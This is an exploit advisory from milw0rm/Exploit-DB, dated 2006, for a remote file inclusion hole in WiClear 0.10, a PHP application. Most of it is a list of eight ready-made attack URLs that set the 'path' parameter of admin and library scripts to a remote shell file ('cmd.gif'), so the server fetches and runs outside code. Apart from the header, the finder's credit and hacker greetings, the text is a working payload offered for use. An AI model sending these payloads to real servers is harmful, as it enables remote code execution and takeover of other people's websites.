WiClear 0.10 - 'path' Remote File Inclusion

EDB-ID:

2624




Platform:

PHP

Date:

2006-10-23


########################################################################
#  wiclear v0.10  Remote File Inclusion Vulnerability
#
#  Download: http://wiclear.free.fr/download/wiclear-0.10.tgz
#
#  Found By: the master (nidhal)
#
########################################################################
#  exploit:
#
#  http://[Target]/[Path]/admin/inc/prepend.inc.php?path=http://cmd.gif?
#  http://[Target]/[Path]/admin/inc/lib/boxes.lib.php?path=http://cmd.gif?
#  http://[Target]/[Path]/admin/inc/lib/tools.lib.php?path=http://cmd.gif?
#  http://[Target]/[Path]/admin/tools/trackback/index.php?path=http://cmd.gif?
#  http://[Target]/[Path]/admin/tools/utf8conversion/index.php?path=http://cmd.gif?
#  http://[Target]/[Path]/inc/prepend.inc.php?path=http://cmd.gif?
#  http://[Target]/[Path]/inc/lib/boxes.lib.php?path=http://cmd.gif?
#  http://[Target]/[Path]/inc/lib/history.lib.php?path=http://cmd.gif?
#
#
# Greetz: str0ke , Dr Max Virus , The Small Hacker , crack_man
########################################################################

# milw0rm.com [2006-10-23]